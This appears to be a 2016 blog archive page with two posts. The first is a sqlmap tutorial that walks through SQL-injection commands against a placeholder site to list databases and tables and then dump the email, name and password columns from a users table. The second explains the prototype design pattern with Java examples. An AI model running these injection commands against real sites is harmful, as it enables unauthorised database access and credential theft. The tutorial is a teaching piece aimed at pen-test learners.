Tuesday, 13 December 2016
Tuesday, 18 October 2016
Exploit SQL Injection Using Sqlmap in kali linux
SQL injection : it is an attack that exploits non-parametrized SQL queries in a database , so that the attacker can insert their own queries.
Sqlmap : This is a very powerful penetration test tool (open source) , it automates the discovery and exploitation of vulnerabilities to SQL injection attacks. It has many functions , and included features such as detecting DBMS, databases, tables , columns, retrieve data and even take control of a database.
Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you
The following tutorial was made with a linux system ( kali linux ).
First we need a target to do this ,
go to your test website in this example we have used a PHP one, we then navigate between pages, when you see ” php? Id ” in the address bar , copy the address.
open your terminal and type this :
sqlmap –u www.site.com/product.php?catid=5 – -dbs
when sqlmap is done, it will tell you the Mysql version and some other information about the database.
At the end of the process , it will show you databases that it has found.
to see tables that are located at the database we gonna type :
sqlmap -u www.site.com/product.php?catid=5 -D acuart –tables
The result should be something like this :
Database: acuart
Database: acuart
[8 tables]
+———–+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
+———–+
+———–+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
+———–+
Now we have a list of tables , we need to get columns so we gonna type :
sqlmap -u www.site.com/product.php?catid=5 -D acuart -T users –columns
The result should be like this :
last step we need to get data from columns , so the final command will look like this.
sqlmap -u www.site.com/product.php?catid=5 -D acuart -T users -C email,name,password -dump
and here’s the final result : we have got the name, mail and password:
Monday, 17 October 2016
What is prototype pattern?
To specify the kinds of objects to create using a prototypical instance, and create new objects by copying this prototype.
Motivation:
A prototype is a template of any object before the actual object is constructed. In java also, it holds the same meaning. Prototype design pattern is used in scenarios where application needs to create a number of instances of a class, which has almost same state or differs very little.
In this design pattern, an instance of actual object (i.e. prototype) is created on starting, and thereafter whenever a new instance is required, this prototype is cloned to have another instance. The main advantage of this pattern is to have minimal instance creation process which is much costly than cloning process.
Some of the situations where the prototype pattern can be applied are given below:
Example 1:
In building stages for a game that uses a maze and different visual objects that the character encounters it is needed a quick method of generating the haze map using the same objects: wall, door, passage, room… The Prototype pattern is useful in this case because instead of hard coding (using new operation) the room, door, passage and wall objects that get instantiated, CreateMaze method will be parameterized by various prototypical room, door, wall and passage objects, so the composition of the map can be easily changed by replacing the prototypical objects with different ones.
The Client is the CreateMaze method and the ConcretePrototype classes will be the ones creating copies for different objects.
Example 2:
Suppose we are doing a sales analysis on a set of data from a database. Normally, we would copy the information from the database, encapsulate it into an object and do the analysis. But if another analysis is needed on the same set of data, reading the database again and creating a new object is not the best idea. If we are using the Prototype pattern then the object used in the first analysis will be cloned and used for the other analysis.
The Client methods process the object that encapsulates information from the database. The ConcretePrototype class will be class that creates the object after extracting data from the database, will copy it into objects used for analysis.
Applicability:
Use prototype pattern when a system should be independent of how its products are created, composed and represented and:
- When the class to be instantiated is specified at runtime or
- To avoid building a hierarchy of factory classes or
- It is more convenient to clone an object rather than creating a new object.
Structure:
Participants:
The classes participating to the Prototype Pattern are:
Client – creates a new object by asking a prototype to clone itself.
Prototype – declares an interface for cloning itself.
ConcretePrototype – implements the operation for cloning itself.
Collaborations:
A client asks a prototype to clone itself.
Consequences:
Benefits of prototype pattern are:
- Adding and removing products at runtime.
- Specifying new objects by varying values.
- Specifying new objects by varying structure.
- Reduced subclassing.
- Configuring an application with classes dynamically.
Main drawback of prototype pattern is that each sub class of Prototype must implement the clone operation, which may be difficult.
Implementation:
abstract class AbstractProduct implements Cloneable { public static AbstractProduct thePrototype; public static AbstractProduct makeProduct() { try { return (AbstractProduct) thePrototype.clone(); } catch(CloneNotSupportedException e) { return null; } } } class ConcreteProductA extends AbstractProduct { } class ConcreteProductB extends AbstractProduct { } public class PrototypeDemo { public static void main(String[] args) { AbstractProduct.thePrototype = new ConcreteProductA(); AbstractProduct product = AbstractProduct.makeProduct(); System.out.println(product); } }
Implementation Issues:
Using a prototype manager:
When the application uses a lot of prototypes that can be created and destroyed dynamically, a registry of available prototypes should be kept. This registry is called the prototype manager and it should implement operations for managing registered prototypes like registering a prototype under a certain key, searching for a prototype with a given key, removing one from the register, etc. The clients will use the interface of the prototype manager to handle prototypes at run-time and will ask for permission before using the Clone() method.
There is not much difference between an implementation of a prototype which uses a prototype manager and a factory method implemented using class registration mechanism. Maybe the only difference consists in the performance.
Implementing the Clone operation:
A small discussion appears when talking about how deep or shallow a clone should be: a deep clone clones the instance variables in the cloning object while a shallow clone shares the instance variables between the clone and the original. Usually, a shallow clone is enough and very simple, but cloning complex prototypes should use deep clones so the clone and the original are independent, a deep clone needing its components to be the clones of the complex object’s components.
Initializing clones:
There are cases when the internal states of a clone should be initialized after it is created. This happens because these values cannot be passed to the Clone() method, that uses an interface which would be destroyed if such parameters were used. In this case the initialization should be done by using setting and resetting operations of the prototype class or by using an initializing method that takes as parameters the values at which the clone’s internal states should be set.
Sample Code:
We’re going to create an abstract class Shape and concrete classes extending the Shape class. A class ShapeCache is defined as a next step which stores shape objects in a Hashtable and returns their clone when requested.
Create an abstract class implementing Clonable interface.
Shape.java
public abstract class Shape implements Cloneable { private String id; protected String type; abstract void draw(); public String getType() { return type; } public String getId() { return id; } public void setId(String id) { this.id = id; } public Object clone() { Object clone = null; try { clone = super.clone(); } catch (CloneNotSupportedException e) { e.printStackTrace(); } return clone; } }
Create concrete classes extending the above class.
Rectangle.java
Rectangle.java
public class Rectangle extends Shape { public Rectangle() { type = "Rectangle"; } @Override public void draw() { System.out.println("Inside Rectangle::draw() method."); } }
Square.java
public class Square extends Shape { public Square() { type = "Square"; } @Override public void draw() { System.out.println("Inside Square::draw() method."); } }
Known Uses:
The first widely known application of the pattern in an object-oriented language was in ThingLab, where users could form a composite object and then promote it to a prototype by installing it in a library of reusable objects. Prototype is used in Etgdb. Etgdb is a debugger front-end based on ET++ that provides a point-and-click interface to different line-oriented debuggers. The “interaction technique library” in Mode Composer stores prototypes of objects that support various interaction techniques.
Related Patterns:
Prototype and Abstract Factory patterns can be used together. Designs that make heavy use of the Composite and Decorator patterns often can benefit from Prototype as well.
Example prototype classes in Java API:
java.lang.Object#clone() (the class has to implement java.lang.Cloneable)
Non-software example:
The Prototype pattern specifies the kind of objects to create using a prototypical instance. Prototypes of new products are often built prior to full production, but in this example, the prototype is passive, and does not participate in copying itself. The mitotic division of a cell, resulting in two identical cells, is an example of a prototype that plays an active role in copying itself and thus, demonstrates the Prototype pattern. When a cell splits, two cells of identical genotype result. In other words, the cell clones itself.
